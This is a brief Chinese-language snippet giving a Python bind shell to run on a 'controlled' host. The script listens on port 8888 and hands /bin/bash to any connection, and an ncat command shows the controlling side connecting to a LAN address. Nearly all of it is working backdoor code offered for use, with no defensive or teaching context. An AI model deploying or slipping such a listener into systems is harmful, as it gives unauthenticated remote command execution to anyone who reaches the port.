被控端运行下面代码

#!/usr/bin/env python
import socket
import subprocess

s = socket.socket(socket.AF_INET)
s.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1)
s.bind(("", 8888))
s.listen(1024)
(conn, address) = s.accept()

p = subprocess.Popen(["/bin/bash"], stdin=conn, stdout=conn, stderr=conn)

主控端连接
ncat -nv 192.168.1.199 8888